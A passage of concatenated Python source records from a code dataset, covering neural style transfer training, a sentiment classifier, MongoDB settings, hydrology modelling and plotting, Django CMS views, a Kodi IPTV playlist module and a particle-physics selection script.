'picasso'\nPRETRAIN = 'imagenet'\n\ndef save_checkpoint(state, filename='checkpoint_res.pth.tar'):\n torch.save(state, filename)\n\nsave_checkpoint({\n 'state_dict_m': resnet_model.cpu().state_dict(),\n}, filename='./transformer_ckpts/checkpoint_pretrain_' + ARCHITECTURE + '_' + PRETRAIN + '_' + STYLE_FIELD + '.pth.tar')\nresnet_model.cuda()\nloss_network = LossNetwork(resnet_model)\nloss_network.eval()\ndel resnet_model\n\nSTYLE_IMAGE = \"style_images/picasso.jpg\"\nstyle_img = Image.open(STYLE_IMAGE).convert('RGB')\nstyle_img_tensor = transforms.Compose([\n transforms.Resize((IMAGE_SIZE, IMAGE_SIZE)),\n transforms.ToTensor(),\n tensor_normalizer()]\n)(style_img).unsqueeze(0)\n# assert np.sum(style_img - recover_image(style_img_tensor.numpy())[0].astype(np.uint8)) < 3 * style_img_tensor.size()[2] * style_img_tensor.size()[3]\nif torch.cuda.is_available():\n style_img_tensor = style_img_tensor.cuda()\n\nplt.imshow(recover_image(style_img_tensor.cpu().numpy())[0])\n\nplt.imshow(recover_image(style_img_tensor.cpu().numpy())[0])\n\n# http://pytorch.org/docs/master/notes/autograd.html#volatile\nstyle_loss_features = loss_network(Variable(style_img_tensor, volatile=True))\ngram_style = [Variable(gram_matrix(y).data, requires_grad=False) for y in style_loss_features]\n\n# style_loss_features._fields\n#\n# np.mean(gram_style[3].data.cpu().numpy())\n#\n# np.mean(style_loss_features[3].data.cpu().numpy())\n#\n# gram_style[0].numel()\n\ndef save_debug_image(tensor_orig, tensor_transformed, filename):\n assert tensor_orig.size() == tensor_transformed.size()\n result = Image.fromarray(recover_image(tensor_transformed.cpu().numpy())[0])\n orig = Image.fromarray(recover_image(tensor_orig.cpu().numpy())[0])\n new_im = Image.new('RGB', (result.size[0] * 2 + 5, result.size[1]))\n new_im.paste(orig, (0,0))\n new_im.paste(result, (result.size[0] + 5,0))\n new_im.save(filename)\n\ntransformer = TransformerNet()\nmse_loss = torch.nn.MSELoss()\n# l1_loss = torch.nn.L1Loss()\nif torch.cuda.is_available():\n transformer.cuda()\n\nCONTENT_WEIGHT = 1e4\nSTYLE_WEIGHT = 1e10\nLOG_INTERVAL = 200\nREGULARIZATION = 1e-7\n\nLR = 1e-4\noptimizer = Adam(transformer.parameters(), LR)\ntransformer.train()\nfor epoch in range(3):\n agg_content_loss = 0.\n agg_style_loss = 0.\n agg_reg_loss = 0.\n count = 0\n for batch_id, (x, _) in tqdm_notebook(enumerate(train_loader), total=len(train_loader)):\n n_batch = len(x)\n count += n_batch\n optimizer.zero_grad()\n x = Variable(x)\n if torch.cuda.is_available():\n x = x.cuda()\n\n y = transformer(x)\n xc = Variable(x.data, volatile=True)\n\n features_y = loss_network(y)\n features_xc = loss_network(xc)\n\n f_xc_c = Variable(features_xc[1].data, requires_grad=False)\n\n content_loss = CONTENT_WEIGHT * mse_loss(features_y[1], f_xc_c)\n\n reg_loss = REGULARIZATION * (\n torch.sum(torch.abs(y[:, :, :, :-1] - y[:, :, :, 1:])) +\n torch.sum(torch.abs(y[:, :, :-1, :] - y[:, :, 1:, :])))\n\n style_loss = 0.\n for m in range(len(features_y)):\n gram_s = gram_style[m]\n gram_y = gram_matrix(features_y[m])\n style_loss += STYLE_WEIGHT * mse_loss(gram_y, gram_s.expand_as(gram_y))\n\n total_loss = content_loss + style_loss + reg_loss\n total_loss.backward()\n optimizer.step()\n\n agg_content_loss += content_loss.item()\n agg_style_loss += style_loss.item()\n agg_reg_loss += reg_loss.item()\n\n if (batch_id + 1) % LOG_INTERVAL == 0:\n mesg = \"{} [{}/{}] content: {:.6f} style: {:.6f} reg: {:.6f} total: {:.6f}\".format(\n time.ctime(), count, len(train_dataset),\n agg_content_loss / 
LOG_INTERVAL,\n agg_style_loss / LOG_INTERVAL,\n agg_reg_loss / LOG_INTERVAL,\n (agg_content_loss + agg_style_loss + agg_reg_loss) / LOG_INTERVAL\n )\n print(mesg)\n agg_content_loss = 0\n agg_style_loss = 0\n agg_reg_loss = 0\n transformer.eval()\n y = transformer(x)\n save_debug_image(x.data, y.data, \"debug/{}_{}.png\".format(epoch, count))\n transformer.train()\n\nimport glob\nfnames = glob.glob(DATASET + \"/*/*\")\nlen(fnames)\n\ntransformer = transformer.eval()\n\nimg = Image.open(fnames[40]).convert('RGB')\ntransform = transforms.Compose([transforms.Resize((IMAGE_SIZE, IMAGE_SIZE)),\n transforms.CenterCrop(IMAGE_SIZE),\n transforms.ToTensor(),\n tensor_normalizer()])\nimg_tensor = transform(img).unsqueeze(0)\nif torch.cuda.is_available():\n img_tensor = img_tensor.cuda()\n\nimg_output = transformer(Variable(img_tensor, volatile=True))\nplt.imshow(recover_image(img_tensor.cpu().numpy())[0])\n\nImage.fromarray(recover_image(img_output.data.cpu().numpy())[0])\n\nsave_model_path = \"model_udnie_imagenet_resnet2.pth\"\ntorch.save(transformer.state_dict(), save_model_path)\n\ntransformer.load_state_dict(torch.load(save_model_path))\n\nimg = Image.open(\"content_images/amber.jpg\").convert('RGB')\ntransform = transforms.Compose([transforms.ToTensor(),\n tensor_normalizer()])\nimg_tensor = transform(img).unsqueeze(0)\nprint(img_tensor.size())\nif torch.cuda.is_available():\n img_tensor = img_tensor.cuda()\n\nimg_output = transformer(Variable(img_tensor, volatile=True))\nplt.imshow(recover_image(img_tensor.cpu().numpy())[0])\n\nplt.imshow(recover_image(img_output.data.cpu().numpy())[0])\n\noutput_img = Image.fromarray(recover_image(img_output.data.cpu().numpy())[0])\noutput_img.save(\"amber_resnet2.png\")\n\n","sub_path":"fast_neural_style_resnet.py","file_name":"fast_neural_style_resnet.py","file_ext":"py","file_size_in_byte":11167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"224875888","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 26 12:09:29 2020\n\n@author: sakib\n\"\"\"\n\nimport pandas as pd\nfrom read_stanford_sentiment_treebank import read_data\nimport re\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.metrics import f1_score\n\n\n\ndataset = read_data('/media/sakib/alpha/work/EmotionDetectionDir/NaiveBayes/stanfordSentimentTreebank')\ndataset['sentiment_values'] = pd.to_numeric(dataset['sentiment_values'], downcast = 'float')\ndataset['sentiment_values'] = (dataset['sentiment_values'] >= 0.4).astype(float)\n\nreview_lines = list()\nlines = dataset['Phrase'].values.tolist()\nsentiment = dataset['sentiment_values']\n\n\nfor line in lines:\n review = re.sub('[^a-zA-Z]', ' ', line)\n review = review.lower()\n review_lines.append(review)\n\n\ndf = pd.DataFrame(\n {'phrase': review_lines,\n 'sentiment': sentiment\n })\n\ndf['phrase'] = df['phrase'].str.lstrip()\n\nfilter = df['phrase'] != \"\"\ndfNew = df[filter]\n\n\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n# Create feature vectors\nvectorizer = TfidfVectorizer(min_df = 5,\n max_df = 0.8,\n sublinear_tf = True,\n use_idf = True)\nX = vectorizer.fit_transform(dfNew['phrase'])\ny = dfNew['sentiment']\n\n\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.20, random_state = 0)\n\n\nfrom 
sklearn.naive_bayes import GaussianNB\nclassifier = GaussianNB()\nclassifier.fit(X_train.toarray(), y_train)\n\n\ny_pred = classifier.predict(X_test.toarray())\n\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test, y_pred)\n\nprint('Accuracy: %.3f' % accuracy_score(y_test, y_pred))\nprint('Precision: %.3f' % precision_score(y_test, y_pred))\nprint('Recall: %.3f' % recall_score(y_test, y_pred))\nprint('F-measure: %.3f' % f1_score(y_test, y_pred))\n\n\n\n# -*- coding: utf-8 -*-\n\n","sub_path":"stanfordSentimentTreebank/NB_2.py","file_name":"NB_2.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"525542380","text":"from pymongo import *\n#client = MongoClient()\n#db = client['test-db34']\n\n #ec2-52-91-156-83.compute-1.amazonaws.com\nconn = MongoClient(\"ec2-54-197-14-189.compute-1.amazonaws.com:27017\")\ndb = conn.Agnes\n\neventsdb = db['events']\nevents_pastdb = db['events_past']\nusersdb = db['users']\ngroupsdb = db['groups']\nuser_eventsdb = db['usersevents']\nuser_groupsdb = db['usersgroups']\nuser_eventslogdb = db['userseventslog']\nusermodeldb = db['usermodel']\neventmodeldb = db['eventmodel_stem_binary']\nUMBC_similaritydb = db['UMBC_similarity']\nUMBC_similaritydb_without = db['UMBC_similarity_without']\n\n\n#user_eventsdb.aggregate([{ \"$match\": { \"users_id\" : ObjectId(\"57802158b2a8c24410d8dd60\"), \"evtdata.random\":1 } },{ \"$redact\": {\"$cond\": [{ \"$eq\": [ { \"$ifNull\": [ \"$random\", 1 ] }, 1 ] },\"$$DESCEND\", \"$$PRUNE\"]}}]);","sub_path":"db_settings.py","file_name":"db_settings.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"86431683","text":"# Force matplotlib to not use any Xwindows backend.\nimport matplotlib\nmatplotlib.use('Agg')\n\nimport sys\nfrom plotnine import *\nimport xarray as xr\nimport pandas as pd\n\ndef plot_hydrographs(channel_files: list,image_filename: str,feature_id: int,obs_file: str=None)->str:\n \"\"\"Example function to plot a timeseries of streamflow for a given feature_id from wrf_hydro CHANOBS files.\n\n Args:\n channel_files: A list of CHANOBS output files from wrf-hydro > v5.0\n image_filename: A string path for .png plot output filename.\n feature_id: The feature_id to plot\n obs_file: An optional string path to an observed value csv file with the following structure, col1 = site number,\n col2 = datetime, col3 = streamflow, m^3/s\n\n Returns:\n A string including the plot file output path.\n \"\"\"\n\n #Open the netcdf dataset\n chrtout_data = xr.open_mfdataset(channel_files)\n\n #Select one feature_id, optional. Can load all into memory by omitting this\n #Note that this is still subject to the same limitations of HDF5/netCDF4. Non-contiguous indices\n #can't be extracted in one disk read. 
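(an illustrative alternative, not part of the original script:\n # chrtout_data = xr.open_mfdataset(channel_files).load() # one sequential pass over all files\n # chrtout_data = chrtout_data.sel(feature_id=feature_id) # then subset cheaply in memory\n # .load() and .sel() are standard xarray Dataset methods; feature_id is this function's own argument.)\n # 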
Thus, if selecting many non-contiguous indices\n #from many files, it is almost always much slower than loading into memory before subsetting\n chrtout_data = chrtout_data.loc[dict(feature_id=feature_id)]\n\n #Load into memory as a pandas.dataframe\n chrtout_data = chrtout_data.to_dataframe()\n\n #Flatten index into a variable for plotting\n chrtout_data = chrtout_data.reset_index(level='time')\n\n #Make feature id a string for plotting\n chrtout_data['feature_id'] = chrtout_data['feature_id'].astype(str)\n\n\n #optionally get the observed data\n if obs_file is not None:\n obs_data = pd.read_csv(obs_file)\n obs_data['dateTime']=pd.to_datetime(obs_data['dateTime'])\n obs_data=obs_data.rename(index=str,columns={'dateTime':'time','streamflow_cms':'streamflow_obs'})\n\n chrtout_data = chrtout_data.rename(index=str,columns={'streamflow':'streamflow_mod'})\n chrtout_data = chrtout_data[['feature_id','time','streamflow_mod']]\n chrtout_data = pd.merge(chrtout_data,obs_data,\n how='left',\n left_on=['time'],\n right_on=['time'])\n chrtout_data=pd.melt(chrtout_data,id_vars=['feature_id','site_no','time'])\n\n #Plot it\n hydrograph = ggplot(chrtout_data,aes(x='time',y='value',color='variable')) + \\\n geom_line() + \\\n scale_x_datetime(breaks='1 days') + \\\n labs(x='Date',y='Streamflow, cms',title='Modelled and Observed streamflow at feature_id '+str(feature_id)) + \\\n theme_bw()\n hydrograph.save(image_filename,'png',height=8,width=8)\n else:\n #Plot it\n hydrograph = ggplot(chrtout_data,aes(x='time',y='streamflow')) + \\\n geom_line() + \\\n scale_x_datetime(breaks='1 days') + \\\n labs(x='Date',y='Streamflow, cms',title='Modelled streamflow at feature_id '+str(feature_id)) + \\\n theme_bw()\n hydrograph.save(image_filename,'png',height=8,width=8)\n\n return('Plot saved as '+image_filename)\n\ndef main(chanout_dir: str,image_filename: str)->None:\n \"\"\"Main body of plotting script outputting a plot to the specified filename path.\n\n Args:\n chanout_dir: A string specifying the directory containing the wrf-hydro CHANOBS files\n image_filename: A string specifying the output path for the plot.\n\n Returns:\n Returns None and outputs a plot to the specified path\n \"\"\"\n channel_files=chanout_dir+'/*CHANOBS*'\n plot_hydrographs(channel_files=channel_files,\n image_filename=image_filename,\n feature_id=6226948,\n obs_file='/home/docker/domain/croton_NY/Croton_usgsObs_01374559.csv')\n\nif __name__ == '__main__':\n main(chanout_dir=sys.argv[1],image_filename=sys.argv[2])\n","sub_path":"training/plot_hydrograph.py","file_name":"plot_hydrograph.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"438646740","text":"from django import forms\n\nfrom datamodel.models import CertRecord\nfrom util.base.view import BaseView\nfrom util.decorator.auth import cms_auth\nfrom util.decorator.param import validate_args, fetch_object\nfrom util.decorator.permission import cms_permission\n\n\nclass CertRecordList(BaseView):\n\n @cms_auth\n @cms_permission('filterCertRecord')\n @validate_args({\n 'stage': forms.IntegerField(required=False),\n })\n def get(self, request, stage=None, **kwargs):\n filter = {}\n if stage:\n filter['stage'] = stage\n qs = CertRecord.objects.filter(**filter)\n return self.success_list(request, qs, cert_to_json)\n\n\nclass CertRecordDetail(BaseView):\n @cms_auth\n @cms_permission('certRecordDetail')\n @fetch_object(CertRecord.objects, 'cert')\n def get(self, request, cert, 
**kwargs):\n return self.success(cert_to_json(cert))\n\n\ndef cert_to_json(cert):\n return {\n 'id': cert.id,\n 'name': cert.name,\n 'pic': cert.certificate.url,\n 'stage': cert.stage,\n }\n","sub_path":"cms/cert/list_detail.py","file_name":"list_detail.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"220164973","text":"# -*- coding: utf8 -*-\nimport os\nimport re\nimport sys\nimport xbmc\nimport requests\n\nreload(sys) \nsys.setdefaultencoding('utf8')\n\nclass Playlist:\n name = 'playlist.m3u'\n channels = []\n raw_m3u = None\n append = True\n \n def __init__(self, name = ''):\n if name != '':\n self.name = name\n \n def save(self, path):\n file_path = os.path.join(path, self.name)\n xbmc.log(\"Saving the playlist: %s \" % file_path, xbmc.LOGNOTICE)\n if os.path.exists(path):\n with open(file_path, 'w') as f:\n f.write(self.to_string().encode('utf-8', 'replace'))\n \n def concat(self, new_m3u, append = True, raw = True):\n if raw: #TODO implement parsing playlists\n self.append = append\n with open(new_m3u, 'r') as f:\n self.raw_m3u = f.read().replace('#EXTM3U', '')\n \n def to_string(self):\n output = ''\n for c in self.channels:\n output += c.to_string()\n \n if self.raw_m3u != None:\n if self.append:\n output += self.raw_m3u\n else:\n output = self.raw_m3u + output\n \n return '#EXTM3U\\n' + output\n\nclass Category:\n\tdef __init__(self, id, title):\n\t\tself.id = id\n\t\tself.title = title\n \nclass Channel:\n\n def __init__(self, attr):\n self.id = attr[0]\n self.disabled = attr[1] == 1\n self.name = attr[2]\n self.category = attr[3]\n self.logo = attr[4]\n self.streams = attr[5]\n self.playpath = '' if attr[6] == None else attr[6]\n self.page_url = '' if attr[7] == None else attr[7]\n self.player_url = '' if attr[8] == None else attr[8]\n self.epg_id = '' if attr[9] == None else attr[9]\n self.user_agent = False if attr[10] == None else attr[10]\n\n def to_string(self):\n output = '#EXTINF:-1 radio=\"False\" tvg-shift=0 group-title=\"%s\" tvg-logo=\"%s\" tvg-id=\"%s\",%s\\n' % (self.category, self.logo, self.epg_id, self.name)\n output += '%s\\n' % self.playpath\n return output \n \nclass Stream:\n def __init__(self, attr):\n self.id = attr[0] \n self.channel_id = attr[1] \n self.url = attr[2]\n self.page_url = attr[3]\n self.player_url = attr[4]\n self.disabled = attr[5] == 1\n self.comment = attr[6]\n self.user_agent = False if attr[9] == None else attr[9]\n if self.url == None:\n self.url = self.resolve()\n if self.url is not None and self.user_agent: \n self.url += '|User-Agent=%s' % self.user_agent\n \n def resolve(self):\n #if '3583019' in self.player_url: #BiT\n #\treturn self._livestream()\n headers = {'User-agent': self.user_agent, 'Referer':self.page_url}\n res = requests.get(self.player_url, headers=headers)\n m = re.compile('(//.*\\.m3u.*?)[\\s\\'\"]+').findall(res.text)\n if len(m) == 0:\n xbmc.log(res.text, xbmc.LOGNOTICE)\n else:\n if not m[0].startswith(\"http:\") and not m[0].startswith(\"https:\"): #some links omit the http prefix\n m[0] = \"http:\" + m[0]\n xbmc.log('Found %s matches in %s' % (len(m), self.player_url), xbmc.LOGNOTICE)\n stream = None if len(m) == 0 else m[0]\n xbmc.log('Extracted video stream %s' % stream, xbmc.LOGNOTICE)\n return stream\n","sub_path":"resources/lib/playlist.py","file_name":"playlist.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"489814451","text":"import numpy as np\nfrom numba import njit\n\n\n@njit\ndef evapotranspiration_daily(plant_factor, available_soil_et, evaporation_node, root_max, anetd,\n n_soil_increments, depth, soil_water, wilting_point, available_water, delta_x):\n\n soil_layer_loss = np.zeros(n_soil_increments, dtype=np.float32)\n et_factor = np.zeros(n_soil_increments, dtype=np.float32)\n\n # Set ET node and adjust et_depth by maximum root depth, scaled by plant growth factor\n et_node = evaporation_node\n if plant_factor > 0:\n et_depth = plant_factor * root_max\n if et_depth > anetd:\n et_node = find_node(depth, et_depth)\n\n # Reduce available soil ET if soil moisture < 0.6 of available water (PRZM5 Manual 4.8)\n total_soil_water = soil_water[:et_node].sum()\n total_available_water = available_water[:et_node].sum()\n if total_available_water > 0:\n frac = total_soil_water / total_available_water\n if frac < 0.6:\n available_soil_et *= frac\n\n # Calculate ET for each node, adjusted for depth\n for i in range(et_node):\n et_factor[i] = max(0., (depth[et_node] - depth[i] + delta_x[i]) * (soil_water[i] - wilting_point[i]))\n et_sum = et_factor.sum()\n if et_sum > 0:\n for i in range(et_node):\n soil_layer_loss[i] = available_soil_et * (et_factor[i] / et_sum)\n\n return soil_layer_loss, et_node\n\n\n@njit\ndef find_node(depth, target_depth):\n return np.argmin(np.abs(depth - target_depth))\n\n\n@njit\ndef initialize_irrigation(field_capacity, wilting_point, irrigation_type, depth, root_max,\n irr_depletion, available_water):\n \"\"\"\n Calculate total available water (field) capacity, irrigation trigger based on rooting depth\n Source: PRZM5 Manual, Section 4.4 (Young and Fry, 2016)\n \"\"\"\n if irrigation_type > 0:\n irrigation_node = find_node(depth, root_max)\n target_dryness = 0\n for i in range(irrigation_node):\n target_dryness += available_water[i] * irr_depletion + wilting_point[i]\n total_fc = np.sum(field_capacity[:irrigation_node])\n return total_fc, target_dryness, irrigation_node\n else:\n return None, None, None\n\n\n@njit\ndef leaching_daily(initial_input, n_soil_increments, field_capacity, soil_water, et_node, wilting_point,\n soil_layer_loss):\n leaching = np.zeros(n_soil_increments, dtype=np.float32)\n remaining_leachate = initial_input\n for node in range(n_soil_increments):\n water_in_node = remaining_leachate - soil_layer_loss[node] + soil_water[node]\n leaching[node] = max(water_in_node - field_capacity[node], 0.)\n soil_water[node] = max(water_in_node - leaching[node], wilting_point[node])\n # TODO - keeping this for the moment, but it seems like this part should be taken care of in evapotranspiration\n if leaching[node] <= 0. and node > et_node:\n leaching[node:n_soil_increments] = 0.\n break\n remaining_leachate = leaching[node]\n return leaching, soil_water\n\n\n@njit\ndef partition_precip_daily(precip, temp, snow_accumulation, sfac, irrigation_type, soil_water, irrigation_node, s,\n target_dryness, total_fc, leaching_factor):\n # Calculate snow accumulation/melt (effective rain is rain + snow melt)\n if temp <= 0:\n\n snow_accumulation += precip\n rain = effective_rain = 0\n else:\n rain = precip\n snow_melt = min(snow_accumulation, (sfac / 100) * temp)\n effective_rain = rain + snow_melt\n snow_accumulation -= snow_melt\n\n # Process irrigation\n if effective_rain <= 0. 
and irrigation_type > 0:\n current_dryness = np.sum(soil_water[:irrigation_node])\n daily_max_irrigation = 0.2 * s\n if current_dryness < target_dryness:\n irrigation_required = (total_fc - current_dryness) * leaching_factor + 1.\n if irrigation_type == 3: # overcanopy irrigation\n rain = effective_rain = min(irrigation_required, daily_max_irrigation)\n elif irrigation_type == 4: # undercanopy irrigation\n effective_rain = min(irrigation_required, daily_max_irrigation)\n\n return rain, effective_rain, snow_accumulation\n\n\n@njit\ndef runoff_and_interception_daily(rain, effective_rain, s, plant_factor, crop_intercept, canopy_water, pet):\n # Determine runoff by the Curve Number Method\n if effective_rain > (0.2 * s):\n runoff = max(0, (effective_rain - (0.2 * s)) ** 2 / (effective_rain + (0.8 * s)))\n else:\n runoff = 0\n\n # Determine canopy intercept\n if rain > 0.:\n # a_c_g is the % of RAIN not going to runoff\n available_canopy_gain = rain * (1. - runoff / effective_rain)\n interception = min(available_canopy_gain, (crop_intercept * plant_factor) - canopy_water)\n canopy_water += interception\n else:\n interception = 0\n canopy_water = max(0., canopy_water - pet)\n\n # Anything that doesn't runoff or get held up is leaching\n leaching = effective_rain - runoff - interception\n\n # Any PET not used to evaporate canopy water is still available\n excess_et = max(0., pet - canopy_water)\n return runoff, leaching, canopy_water, excess_et\n\n\n@njit\ndef surface_hydrology(field_capacity, wilting_point, plant_factor, cn, depth, # From other function output\n irrigation_type, irr_depletion, anetd, root_max, leaching_factor, cintcp, # From scenario\n precip, temp, potential_et, # From metfile\n n_soil_increments, delta_x, sfac): # From parameters\n \"\"\" Process hydrology parameters, returning daily runoff, soil water content, and leaching (velocity) \"\"\"\n # Initialize arrays and running variables\n # Daily time series\n n_dates = plant_factor.size\n surface_velocity = np.zeros(n_dates, dtype=np.float32)\n surface_soil_water = np.zeros(n_dates, dtype=np.float32)\n daily_rain = np.zeros(n_dates, dtype=np.float32)\n daily_effective_rain = np.zeros(n_dates, dtype=np.float32)\n daily_runoff = np.zeros(n_dates, dtype=np.float32)\n\n # Soil profile arrays (by node)\n soil_water = field_capacity.copy() # initialize at field capacity\n\n # Calculate these ahead of time for efficiency\n usle_s_factor = ((2540 / cn) - 25.4) / 100. 
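# worked note: the SCS curve-number retention is S(in) = 1000/CN - 10; multiplying by 2.54 gives S(cm) = 2540/CN - 25.4, and the final /100 converts 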
# cm -> m\n available_water = field_capacity - wilting_point\n\n total_fc, target_dryness, irrigation_node = \\\n initialize_irrigation(field_capacity, wilting_point, irrigation_type, depth, root_max, irr_depletion,\n available_water)\n\n # Set evaporation node\n evaporation_node = find_node(depth, anetd)\n\n # Running variables\n canopy_water = 0\n snow_accumulation = 0\n\n for day in range(precip.size):\n # 'rain' is water from above the canopy, 'effective rain' is above AND below canopy\n rain, effective_rain, snow_accumulation = \\\n partition_precip_daily(precip[day], temp[day], snow_accumulation, sfac, irrigation_type, soil_water,\n irrigation_node, usle_s_factor[day], target_dryness, total_fc, leaching_factor)\n\n runoff, leaching, canopy_water, available_soil_et = \\\n runoff_and_interception_daily(rain, effective_rain, usle_s_factor[day], plant_factor[day], cintcp, canopy_water,\n potential_et[day])\n\n soil_layer_loss, et_node = \\\n evapotranspiration_daily(plant_factor[day], available_soil_et, evaporation_node, root_max, anetd,\n n_soil_increments, depth, soil_water, wilting_point, available_water, delta_x)\n\n velocity, soil_water = \\\n leaching_daily(leaching, n_soil_increments, field_capacity, soil_water, et_node, wilting_point,\n soil_layer_loss)\n\n surface_velocity[day] = velocity[0]\n surface_soil_water[day] = soil_water[0]\n daily_rain[day] = rain\n daily_effective_rain[day] = effective_rain\n daily_runoff[day] = runoff\n\n return daily_runoff, daily_rain, daily_effective_rain, surface_soil_water, surface_velocity\n","sub_path":"hydrology.py","file_name":"hydrology.py","file_ext":"py","file_size_in_byte":8169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"583919282","text":"import ROOT\n\nk_low, k_up = 0.93, 1.13\n\nfolder = \"bkgAndSigPlots\"\ntitle = \"Dijet matching efficiency for M = XXX GeV \"\ncolors = [\nROOT.kBlack,\n\nROOT.kRed,\nROOT.kBlue,\nROOT.kMagenta,\nROOT.kCyan+1,\nROOT.kGreen+2,\nROOT.kYellow+1,\n\nROOT.kGray+2,\n\nROOT.kViolet,\nROOT.kAzure,\nROOT.kTeal,\nROOT.kSpring,\n\nROOT.kOrange,\nROOT.kPink,\n]\n\n\n# ROOT.gROOT.SetBatch(0)\n# canv2 = ROOT.TCanvas()\n\n\npreselection = \"HTgoodJets>250\"\n#preselection = \"HTgoodJets>350 && mhtAK4<110\"\n#preselection = \"isr_pt>70 && dijet_pt>140 && jet2_pt>45 && jet1_pt>90 && HTgoodJets>350 && trijet_dr<3.4 && fabs(trijet_eta)>0.3 && abs(dijet_deta)<1.2 && abs(trijet_dphi)<1.8 && mhtAK4Sig<0.11 && met<100 && mhtAK4<110\"\n\n#preselection = \"HTgoodJets>350 && mhtAK4Sig<0.11 \"\n#preselection = \"HTgoodJets>350 && mhtAK4Sig<0.11 && trijet_dr<3.4 \"\n#preselection = \"HTgoodJets>350 && mhtAK4Sig<0.11 && trijet_dr<3.4 && jet2_pt>45 \"\n#preselection = \"HTgoodJets>350 && mhtAK4Sig<0.11 && trijet_dr<3.4 && jet2_pt>45 && abs(dijet_deta)<1.2 \"\n#preselection = \"HTgoodJets>350 && mhtAK4Sig<0.11 && trijet_dr<3.4 && jet2_pt>45 && abs(dijet_deta)<1.2 && dijet_pt>140 \"\n#preselection = \"HTgoodJets>350 && mhtAK4Sig<0.11 && trijet_dr<3.4 && jet2_pt>45 && abs(dijet_deta)<1.2 && dijet_pt>140 && jet1_pt>90 \"\n#preselection = \"HTgoodJets>350 && mhtAK4Sig<0.11 && trijet_dr<3.4 && jet2_pt>45 && abs(dijet_deta)<1.2 && dijet_pt>140 && jet1_pt>90 && mhtAK4<110 \"\n#preselection = \"HTgoodJets>350 && mhtAK4Sig<0.11 && trijet_dr<3.4 && jet2_pt>45 && abs(dijet_deta)<1.2 && dijet_pt>140 && jet1_pt>90 && mhtAK4<110 && met<100 \"\n#preselection = \"HTgoodJets>350 && mhtAK4Sig<0.11 && trijet_dr<3.4 && jet2_pt>45 && abs(dijet_deta)<1.2 && dijet_pt>140 && jet1_pt>90 && 
mhtAK4<110 && met<100 && isr_pt>70 \"\n#preselection = \"HTgoodJets>350 && mhtAK4Sig<0.11 && trijet_dr<3.4 && jet2_pt>45 && abs(dijet_deta)<1.2 && dijet_pt>140 && jet1_pt>90 && mhtAK4<110 && met<100 && isr_pt>70 && fabs(trijet_eta)>0.3 \"\n\n\n\ncommon = \"1\"\ncommon = \" run<=280385 && abs(jet1_eta)<2.5 && abs(jet2_eta)<2.5 && abs(isr_eta)<2.5 && HLT_CaloScoutingHT250 && HTgoodJets>0 && isr_pt>=50\" #&& && abs(dijet_deta)<1.1\n\npreselections = [\n# common + \"&& isr_pt>=0\",\n# common + \"&& isr_pt>=30\",\n# common + \"&& isr_pt>=40\",\n common + \"&& isr_pt>=50\",\n# common + \"&& isr_pt>=60\",\n #common + \"&& isr_pt>=70\",\n #common + \"&& isr_pt>=80\",\n #common + \"&& isr_pt>=90\",\n #common + \"&& isr_pt>=100\",\n #common + \"&& isr_pt>=110\",\n #common + \"&& isr_pt>=120\",\n #common + \"&& isr_pt>=130\",\n #common + \"&& isr_pt>=140\",\n #common + \"&& isr_pt>=150\",\n #common + \"&& isr_pt>=160\",\n #common + \"&& isr_pt>=170\",\n #common + \"&& isr_pt>=180\",\n #common + \"&& isr_pt>=190\",\n #common + \"&& isr_pt>=200\",\n]\n\n\ncommon = common + \"&& dijet_mass>=540\"\npreselections = [\n common + \"&& dijet_mass<=600\",\n common + \"&& dijet_mass<=605\",\n common + \"&& dijet_mass<=610\",\n common + \"&& dijet_mass<=615\",\n common + \"&& dijet_mass<=620\",\n common + \"&& dijet_mass<=625\",\n common + \"&& dijet_mass<=630\",\n common + \"&& dijet_mass<=635\",\n common + \"&& dijet_mass<=640\",\n common + \"&& dijet_mass<=645\",\n common + \"&& dijet_mass<=650\",\n common + \"&& dijet_mass<=655\",\n common + \"&& dijet_mass<=660\",\n common + \"&& dijet_mass<=665\",\n common + \"&& dijet_mass<=670\",\n common + \"&& dijet_mass<=675\",\n common + \"&& dijet_mass<=680\",\n common + \"&& dijet_mass<=685\",\n common + \"&& dijet_mass<=690\",\n common + \"&& dijet_mass<=695\",\n common + \"&& dijet_mass<=700\",\n common + \"&& dijet_mass<=705\",\n]\n\ncommon = common + \"&& dijet_mass<=680\"\npreselections = [\n common + \"&& dijet_mass>=600\",\n common + \"&& dijet_mass>=590\",\n common + \"&& dijet_mass>=585\",\n common + \"&& dijet_mass>=580\",\n common + \"&& dijet_mass>=575\",\n common + \"&& dijet_mass>=570\",\n common + \"&& dijet_mass>=565\",\n common + \"&& dijet_mass>=560\",\n common + \"&& dijet_mass>=555\",\n common + \"&& dijet_mass>=550\",\n common + \"&& dijet_mass>=545\",\n]\n\ncommon = common + \"&& dijet_mass<=680\"\npreselections = [\n common + \"&& abs(dijet_deta)<1.7\",\n common + \"&& abs(dijet_deta)<1.6\",\n common + \"&& abs(dijet_deta)<1.5\",\n common + \"&& abs(dijet_deta)<1.4\",\n common + \"&& abs(dijet_deta)<1.3\",\n common + \"&& abs(dijet_deta)<1.2\",\n common + \"&& abs(dijet_deta)<1.1\",\n common + \"&& abs(dijet_deta)<1.0\",\n common + \"&& abs(dijet_deta)<0.9\",\n common + \"&& abs(dijet_deta)<0.8\",\n]\n\n\n\n\n#mcReco_matching = 